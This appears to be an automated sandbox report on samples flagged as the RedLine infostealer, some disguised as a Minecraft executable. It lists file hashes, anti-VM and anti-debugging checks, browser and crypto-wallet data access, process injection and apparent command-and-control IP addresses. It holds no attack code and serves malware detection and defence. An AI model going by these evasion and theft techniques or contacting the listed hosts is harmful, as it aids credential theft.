C:\Users\Admin\AppData\Local\Temp\_MEI17762\base_library.zip
| MD5 | 19d34805782c4704d1e2a81fe32e9c27 |
| SHA1 | 8c3d99a0616abc478d6230d07f9dc7b38313813e |
| SHA256 | 06f3c20b42de72e69e9c6b2f66f149f5a65161873e30d07129333f53858d97bb |
| SHA512 | 267b8db8751ea170cd2e04ff5a4d87b0b65edc6d251a8016c213c97bcd8f3a12d955fc25860147b303b153b00d0a41191c09ed24e6fd4b95cb34ae98009456a4 |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\_ctypes.pyd
| MD5 | f1e33a8f6f91c2ed93dc5049dd50d7b8 |
| SHA1 | 23c583dc98aa3f6b8b108db5d90e65d3dd72e9b4 |
| SHA256 | 9459d246df7a3c638776305cf3683946ba8db26a7de90df8b60e1be0b27e53c4 |
| SHA512 | 229896da389d78cbdf2168753ed7fcc72d8e0e62c6607a3766d6d47842c0abd519ac4f5d46607b15e7ba785280f9d27b482954e931645337a152b8a54467c6a5 |
\Users\Admin\AppData\Local\Temp\_MEI17762\libffi-7.dll
| MD5 | 4424baf6ed5340df85482fa82b857b03 |
| SHA1 | 181b641bf21c810a486f855864cd4b8967c24c44 |
| SHA256 | 8c1f7f64579d01fedfde07e0906b1f8e607c34d5e6424c87abe431a2322eba79 |
| SHA512 | 8adb94893ada555de2e82f006ab4d571fad8a1b16ac19ca4d2efc1065677f25d2de5c981473fabd0398f6328c1be1ebd4d36668ea67f8a5d25060f1980ee7e33 |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\libffi-7.dll
| MD5 | 4424baf6ed5340df85482fa82b857b03 |
| SHA1 | 181b641bf21c810a486f855864cd4b8967c24c44 |
| SHA256 | 8c1f7f64579d01fedfde07e0906b1f8e607c34d5e6424c87abe431a2322eba79 |
| SHA512 | 8adb94893ada555de2e82f006ab4d571fad8a1b16ac19ca4d2efc1065677f25d2de5c981473fabd0398f6328c1be1ebd4d36668ea67f8a5d25060f1980ee7e33 |
\Users\Admin\AppData\Local\Temp\_MEI17762\_ctypes.pyd
| MD5 | f1e33a8f6f91c2ed93dc5049dd50d7b8 |
| SHA1 | 23c583dc98aa3f6b8b108db5d90e65d3dd72e9b4 |
| SHA256 | 9459d246df7a3c638776305cf3683946ba8db26a7de90df8b60e1be0b27e53c4 |
| SHA512 | 229896da389d78cbdf2168753ed7fcc72d8e0e62c6607a3766d6d47842c0abd519ac4f5d46607b15e7ba785280f9d27b482954e931645337a152b8a54467c6a5 |
\Users\Admin\AppData\Local\Temp\_MEI17762\_socket.pyd
| MD5 | d6bae4b430f349ab42553dc738699f0e |
| SHA1 | 7e5efc958e189c117eccef39ec16ebf00e7645a9 |
| SHA256 | 587c4f3092b5f3e34f6b1e927ecc7127b3fe2f7fa84e8a3d0c41828583bd5cef |
| SHA512 | a8f8fed5ea88e8177e291b708e44b763d105907e9f8c9e046c4eebb8684a1778383d1fba6a5fa863ca37c42fd58ed977e9bb3a6b12c5b8d9ab6ef44de75e3d1e |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\_socket.pyd
| MD5 | d6bae4b430f349ab42553dc738699f0e |
| SHA1 | 7e5efc958e189c117eccef39ec16ebf00e7645a9 |
| SHA256 | 587c4f3092b5f3e34f6b1e927ecc7127b3fe2f7fa84e8a3d0c41828583bd5cef |
| SHA512 | a8f8fed5ea88e8177e291b708e44b763d105907e9f8c9e046c4eebb8684a1778383d1fba6a5fa863ca37c42fd58ed977e9bb3a6b12c5b8d9ab6ef44de75e3d1e |
\Users\Admin\AppData\Local\Temp\_MEI17762\select.pyd
| MD5 | 6ae54d103866aad6f58e119d27552131 |
| SHA1 | bc53a92a7667fd922ce29e98dfcf5f08f798a3d2 |
| SHA256 | 63b81af5d3576473c17ac929bea0add5bf8d7ea95c946caf66cbb9ad3f233a88 |
| SHA512 | ff23f3196a10892ea22b28ae929330c8b08ab64909937609b7af7bfb1623cd2f02a041fd9fab24e4bc1754276bdafd02d832c2f642c8ecdcb233f639bdf66dd0 |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\select.pyd
| MD5 | 6ae54d103866aad6f58e119d27552131 |
| SHA1 | bc53a92a7667fd922ce29e98dfcf5f08f798a3d2 |
| SHA256 | 63b81af5d3576473c17ac929bea0add5bf8d7ea95c946caf66cbb9ad3f233a88 |
| SHA512 | ff23f3196a10892ea22b28ae929330c8b08ab64909937609b7af7bfb1623cd2f02a041fd9fab24e4bc1754276bdafd02d832c2f642c8ecdcb233f639bdf66dd0 |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\libcrypto-1_1.dll
| MD5 | bf83f8ad60cb9db462ce62c73208a30d |
| SHA1 | f1bc7dbc1e5b00426a51878719196d78981674c4 |
| SHA256 | 012866b68f458ec204b9bce067af8f4a488860774e7e17973c49e583b52b828d |
| SHA512 | ae1bdda1c174ddf4205ab19a25737fe523dca6a9a339030cd8a95674c243d0011121067c007be56def4eaeffc40cbdadfdcbd1e61df3404d6a3921d196dcd81e |
\Users\Admin\AppData\Local\Temp\_MEI17762\libssl-1_1.dll
| MD5 | fe1f3632af98e7b7a2799e3973ba03cf |
| SHA1 | 353c7382e2de3ccdd2a4911e9e158e7c78648496 |
| SHA256 | 1ce7ba99e817c1c2d71bc88a1bdd6fcad82aa5c3e519b91ebd56c96f22e3543b |
| SHA512 | a0123dfe324d3ebf68a44afafca7c6f33d918716f29b063c72c4a8bd2006b81faea6848f4f2423778d57296d7bf4f99a3638fc87b37520f0dcbeefa3a2343de0 |
\Users\Admin\AppData\Local\Temp\_MEI17762\libcrypto-1_1.dll
| MD5 | bf83f8ad60cb9db462ce62c73208a30d |
| SHA1 | f1bc7dbc1e5b00426a51878719196d78981674c4 |
| SHA256 | 012866b68f458ec204b9bce067af8f4a488860774e7e17973c49e583b52b828d |
| SHA512 | ae1bdda1c174ddf4205ab19a25737fe523dca6a9a339030cd8a95674c243d0011121067c007be56def4eaeffc40cbdadfdcbd1e61df3404d6a3921d196dcd81e |
\Users\Admin\AppData\Local\Temp\_MEI17762\libcrypto-1_1.dll
| MD5 | bf83f8ad60cb9db462ce62c73208a30d |
| SHA1 | f1bc7dbc1e5b00426a51878719196d78981674c4 |
| SHA256 | 012866b68f458ec204b9bce067af8f4a488860774e7e17973c49e583b52b828d |
| SHA512 | ae1bdda1c174ddf4205ab19a25737fe523dca6a9a339030cd8a95674c243d0011121067c007be56def4eaeffc40cbdadfdcbd1e61df3404d6a3921d196dcd81e |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\libssl-1_1.dll
| MD5 | fe1f3632af98e7b7a2799e3973ba03cf |
| SHA1 | 353c7382e2de3ccdd2a4911e9e158e7c78648496 |
| SHA256 | 1ce7ba99e817c1c2d71bc88a1bdd6fcad82aa5c3e519b91ebd56c96f22e3543b |
| SHA512 | a0123dfe324d3ebf68a44afafca7c6f33d918716f29b063c72c4a8bd2006b81faea6848f4f2423778d57296d7bf4f99a3638fc87b37520f0dcbeefa3a2343de0 |
\Users\Admin\AppData\Local\Temp\_MEI17762\_ssl.pyd
| MD5 | 8ee827f2fe931163f078acdc97107b64 |
| SHA1 | 149bb536f3492bc59bd7071a3da7d1f974860641 |
| SHA256 | eaeefa6722c45e486f48a67ba18b4abb3ff0c29e5b30c23445c29a4d0b1cd3e4 |
| SHA512 | a6d24e72bf620ef695f08f5ffde70ef93f42a3fa60f7c76eb0f521393c595717e05ccb7a61ae216c18fe41e95fb238d82637714cf5208ee8f1dd32ae405b5565 |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\_ssl.pyd
| MD5 | 8ee827f2fe931163f078acdc97107b64 |
| SHA1 | 149bb536f3492bc59bd7071a3da7d1f974860641 |
| SHA256 | eaeefa6722c45e486f48a67ba18b4abb3ff0c29e5b30c23445c29a4d0b1cd3e4 |
| SHA512 | a6d24e72bf620ef695f08f5ffde70ef93f42a3fa60f7c76eb0f521393c595717e05ccb7a61ae216c18fe41e95fb238d82637714cf5208ee8f1dd32ae405b5565 |
memory/3540-145-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI17762\_hashlib.pyd
| MD5 | a6448bc5e5da21a222de164823add45c |
| SHA1 | 6c26eb949d7eb97d19e42559b2e3713d7629f2f9 |
| SHA256 | 3692fc8e70e6e29910032240080fc8109248ce9a996f0a70d69acf1542fca69a |
| SHA512 | a3833c7e1cf0e4d181ac4de95c5dfa685cf528dc39010bf0ac82864953106213eccff70785021ccb05395b5cf0dcb89404394327cd7e69f820d14dfa6fba8cba |
\Users\Admin\AppData\Local\Temp\_MEI17762\_hashlib.pyd
| MD5 | a6448bc5e5da21a222de164823add45c |
| SHA1 | 6c26eb949d7eb97d19e42559b2e3713d7629f2f9 |
| SHA256 | 3692fc8e70e6e29910032240080fc8109248ce9a996f0a70d69acf1542fca69a |
| SHA512 | a3833c7e1cf0e4d181ac4de95c5dfa685cf528dc39010bf0ac82864953106213eccff70785021ccb05395b5cf0dcb89404394327cd7e69f820d14dfa6fba8cba |
\Users\Admin\AppData\Local\Temp\_MEI17762\_queue.pyd
| MD5 | 44b72e0ad8d1e1ec3d8722088b48c3c5 |
| SHA1 | e0f41bf85978dd8f5abb0112c26322b72c0d7770 |
| SHA256 | 4aa1bbde1621c49edab4376cf9a13c1aa00a9b0a9905d9640a2694ef92f77d5e |
| SHA512 | 05853f93c6d79d8f9c96519ce4c195b9204df1255b01329deaa65e29bd3e988d41454cd305e2199404f587e855737879c330638f2f07bff11388a49e67ba896c |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\_queue.pyd
| MD5 | 44b72e0ad8d1e1ec3d8722088b48c3c5 |
| SHA1 | e0f41bf85978dd8f5abb0112c26322b72c0d7770 |
| SHA256 | 4aa1bbde1621c49edab4376cf9a13c1aa00a9b0a9905d9640a2694ef92f77d5e |
| SHA512 | 05853f93c6d79d8f9c96519ce4c195b9204df1255b01329deaa65e29bd3e988d41454cd305e2199404f587e855737879c330638f2f07bff11388a49e67ba896c |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\_bz2.pyd
| MD5 | 3dc8af67e6ee06af9eec52fe985a7633 |
| SHA1 | 1451b8c598348a0c0e50afc0ec91513c46fe3af6 |
| SHA256 | c55821f5fdb0064c796b2c0b03b51971f073140bc210cbe6ed90387db2bed929 |
| SHA512 | da16bfbc66c8abc078278d4d3ce1595a54c9ef43ae8837ceb35ae2f4757b930fe55e258827036eba8218315c10af5928e30cb22c60ff69159c8fe76327280087 |
\Users\Admin\AppData\Local\Temp\_MEI17762\_lzma.pyd
| MD5 | 37057c92f50391d0751f2c1d7ad25b02 |
| SHA1 | a43c6835b11621663fa251da421be58d143d2afb |
| SHA256 | 9442dc46829485670a6ac0c02ef83c54b401f1570d1d5d1d85c19c1587487764 |
| SHA512 | 953dc856ad00c3aec6aeab3afa2deb24211b5b791c184598a2573b444761db2d4d770b8b807ebba00ee18725ff83157ec5fa2e3591a7756eb718eba282491c7c |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\_lzma.pyd
| MD5 | 37057c92f50391d0751f2c1d7ad25b02 |
| SHA1 | a43c6835b11621663fa251da421be58d143d2afb |
| SHA256 | 9442dc46829485670a6ac0c02ef83c54b401f1570d1d5d1d85c19c1587487764 |
| SHA512 | 953dc856ad00c3aec6aeab3afa2deb24211b5b791c184598a2573b444761db2d4d770b8b807ebba00ee18725ff83157ec5fa2e3591a7756eb718eba282491c7c |
\Users\Admin\AppData\Local\Temp\_MEI17762\_bz2.pyd
| MD5 | 3dc8af67e6ee06af9eec52fe985a7633 |
| SHA1 | 1451b8c598348a0c0e50afc0ec91513c46fe3af6 |
| SHA256 | c55821f5fdb0064c796b2c0b03b51971f073140bc210cbe6ed90387db2bed929 |
| SHA512 | da16bfbc66c8abc078278d4d3ce1595a54c9ef43ae8837ceb35ae2f4757b930fe55e258827036eba8218315c10af5928e30cb22c60ff69159c8fe76327280087 |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\certifi\cacert.pem
| MD5 | 1ba3b44f73a6b25711063ea5232f4883 |
| SHA1 | 1b1a84804f896b7085924f8bf0431721f3b5bdbe |
| SHA256 | bb77f13d3fbec9e98bbf28ac95046b44196c7d8f55ab7720061e99991a829197 |
| SHA512 | 0dd2a14331308b1de757d56fab43678431e0ad6f5f5b12c32fa515d142bd955f8be690b724e07f41951dd03c9fee00e604f4e0b9309da3ea438c8e9b56ca581b |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\unicodedata.pyd
| MD5 | 4c0d43f1a31e76255cb592bb616683e7 |
| SHA1 | 0a9f3d77a6e064baebacacc780701117f09169ad |
| SHA256 | 0f84e9f0d0bf44d10527a9816fcab495e3d797b09e7bbd1e6bd666ceb4b6c1a8 |
| SHA512 | b8176a180a441fe402e86f055aa5503356e7f49e984d70ab1060dee4f5f17fcec9c01f75bbff75ce5f4ef212677a6525804be53646cc0d7817b6ed5fd83fd778 |
\Users\Admin\AppData\Local\Temp\_MEI17762\unicodedata.pyd
| MD5 | 4c0d43f1a31e76255cb592bb616683e7 |
| SHA1 | 0a9f3d77a6e064baebacacc780701117f09169ad |
| SHA256 | 0f84e9f0d0bf44d10527a9816fcab495e3d797b09e7bbd1e6bd666ceb4b6c1a8 |
| SHA512 | b8176a180a441fe402e86f055aa5503356e7f49e984d70ab1060dee4f5f17fcec9c01f75bbff75ce5f4ef212677a6525804be53646cc0d7817b6ed5fd83fd778 |
memory/1196-157-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win10v20210410
Max time kernel
16s
Max time network
140s
Command Line
Signatures
RedLine
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Bird.exe
"C:\Users\Admin\AppData\Local\Temp\Bird.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 65.21.103.71:56458 | 65.21.103.71 | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
Files
memory/3972-115-0x0000000001040000-0x0000000001041000-memory.dmp
memory/3972-117-0x00000000062C0000-0x00000000062C1000-memory.dmp
memory/3972-118-0x0000000006DD0000-0x0000000006DD1000-memory.dmp
memory/3972-119-0x0000000077D20000-0x0000000077EAE000-memory.dmp
memory/3972-120-0x0000000005E60000-0x0000000005E61000-memory.dmp
memory/3972-121-0x0000000005DF0000-0x0000000005DF1000-memory.dmp
memory/3972-122-0x0000000006900000-0x0000000006901000-memory.dmp
memory/3972-123-0x0000000006BF0000-0x0000000006BF1000-memory.dmp
memory/3972-124-0x0000000005DC0000-0x00000000062BE000-memory.dmp
memory/3972-125-0x0000000008520000-0x0000000008521000-memory.dmp
memory/3972-126-0x0000000008E00000-0x0000000008E01000-memory.dmp
memory/3972-127-0x0000000009500000-0x0000000009501000-memory.dmp
memory/3972-128-0x0000000008D30000-0x0000000008D31000-memory.dmp
memory/3972-129-0x0000000008DD0000-0x0000000008DD1000-memory.dmp
memory/3972-130-0x00000000092F0000-0x00000000092F1000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win7v20210410
Max time kernel
42s
Max time network
80s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1644 set thread context of 1584 | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe
"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe"
C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe
"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe"
C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe
"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 109.248.201.150:63757 | 109.248.201.150 | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
Files
memory/1644-60-0x0000000000980000-0x0000000000981000-memory.dmp
memory/1644-62-0x0000000004350000-0x0000000004351000-memory.dmp
memory/1644-63-0x0000000000520000-0x000000000053C000-memory.dmp
memory/1584-65-0x0000000000418E52-mapping.dmp
memory/1584-64-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1584-66-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1584-68-0x00000000044F0000-0x00000000044F1000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win10v20210408
Max time kernel
58s
Max time network
141s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3260 set thread context of 928 | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe
"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe"
C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe
"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe"
C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe
"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 109.248.201.150:63757 | 109.248.201.150 | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
Files
memory/3260-116-0x0000000000CA0000-0x0000000000CA1000-memory.dmp
memory/3260-118-0x0000000005AF0000-0x0000000005AF1000-memory.dmp
memory/3260-119-0x0000000005690000-0x0000000005691000-memory.dmp
memory/3260-120-0x00000000055F0000-0x0000000005AEE000-memory.dmp
memory/3260-121-0x0000000005630000-0x0000000005631000-memory.dmp
memory/3260-122-0x00000000058E0000-0x00000000058FC000-memory.dmp
memory/3260-123-0x0000000005FF0000-0x0000000005FF1000-memory.dmp
memory/3260-124-0x0000000005A90000-0x0000000005A91000-memory.dmp
memory/928-125-0x0000000000400000-0x000000000041E000-memory.dmp
memory/928-126-0x0000000000418E52-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Minecraft_v4.4.exe.log
| MD5 | 3aa80cec1e822c7c05004e9f0acfa829 |
| SHA1 | 96f7755d272b8344d7080261c8cdfd4da40b3313 |
| SHA256 | 2b0d7da3008d206dccc52643fe735565c55b813fbbd25a4420c22c3f6f9dc3f7 |
| SHA512 | 1bd89e891aea6d2b14188e74c3c3b76a2633aef60e3c83a2230422c09ffc1cc636bf3ca43d211660a31ef0d044db0e9852d1f87c27f6854e2453177106d2637c |
memory/928-130-0x0000000005DA0000-0x0000000005DA1000-memory.dmp
memory/928-131-0x00000000057B0000-0x00000000057B1000-memory.dmp
memory/928-132-0x0000000005810000-0x0000000005811000-memory.dmp
memory/928-133-0x0000000005850000-0x0000000005851000-memory.dmp
memory/928-134-0x0000000005790000-0x0000000005D96000-memory.dmp
memory/928-135-0x0000000005B20000-0x0000000005B21000-memory.dmp
memory/928-136-0x0000000006C00000-0x0000000006C01000-memory.dmp
memory/928-137-0x0000000007300000-0x0000000007301000-memory.dmp
memory/928-138-0x0000000006DD0000-0x0000000006DD1000-memory.dmp